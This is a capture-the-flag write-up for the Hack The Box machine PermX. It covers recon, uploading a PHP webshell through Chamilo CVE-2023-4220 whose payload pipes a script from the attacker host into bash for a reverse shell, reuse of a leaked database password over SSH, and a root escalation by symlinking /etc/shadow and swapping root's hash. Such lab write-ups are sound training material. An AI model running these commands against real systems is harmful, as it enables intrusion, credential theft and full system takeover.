> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2026-03-27

Hack The Box - PermX (Linux)

Chamilo LMS exploitation via CVE-2023-4220 for initial access, credential reuse to SSH, and root escalation by abusing a vulnerable ACL helper script with symlink trickery.

Target

  • IP: 10.129.241.93

Recon

sudo nmap -sC -sV 10.129.241.93 -p- -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add permx.htb to /etc/hosts.

Virtual Host Discovery

ffuf -u 'http://permx.htb/' -H 'Host: FUZZ.permx.htb' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -fw 18

www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 51ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 1422ms]
WWW                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 97ms]
LMS                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 140ms]

Add www.permx.htb and lms.permx.htb to /etc/hosts.

Browse to http://lms.permx.htb/.

Observed banner:

Powered by Chamilo © 2024

Local Chamilo Lab Notes

Check the attached files used to reproduce locally:

  • attachments/Dockerfile
  • attachments/chamilo.conf
docker build -t mychamilo .

/usr/sbin/mysqld --skip-grant-tables --user=root &
mysql -u root
use mysql
update user set plugin="mysql_native_password" where User='root';
ALTER USER 'root'@'localhost' IDENTIFIED BY 'ciao';
FLUSH PRIVILEGES;

CTRL+D

killall -9 mysqld
/etc/init.d/mysql start
/etc/init.d/apache2 start

If Apache does not start, run the command again.

Open Firefox on http://127.0.0.1/ and continue the setup procedure. At one step, an admin password is required, and a random password is suggested.

Failed Password Brute Force

hydra -l admin -P /usr/share/wordlists/rockyou.txt lms.permx.htb http-post-form "/index.php:login=^USER^&password=^PASS^&submitAuth=&_qf__formLogin=:F=incorrect"

This did not work.

Initial Access via Chamilo RCE

A public exploit for CVE-2023-4220 is available:

  • https://starlabs.sg/advisories/23/23-4220/

Start a listener:

nc -vlnp 4444

Create payload and upload it:

echo '<?php system("curl http://10.10.16.25/shell | bash"); ?>' > rce.php
curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'

We get a reverse shell.

Post-Exploitation Enumeration

cat /var/www/chamilo/main/install/version.php

Version 1.11.24

cat /var/www/chamilo/app/config/configuration.php

$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;

cat /etc/passwd

A local user mtz is present.

User Access

ssh mtz@permx.htb

Use the password found in the configuration.

Privilege Escalation

sudo -l

Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

cat /opt/acl.sh

#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

On the attacker machine, create a known hash:

docker run -it ubuntu:latest
useradd test
passwd test

Set password to 1234.

cat /etc/shadow

test:$y$j9T$H/bZuEutXRuRCiMPV.JzK1$tiSfIoRsqIGhVRcXIfyiiRRk46nNn0bkExZOoAhnvT5:19912:0:99999:7:::

On the victim machine:

ln -s ../../etc/shadow
sudo /opt/acl.sh mtz rwx '/home/mtz/shadow'
vim shadow

Replace root hash with the test hash.

su root

Use password 1234. We get a root shell.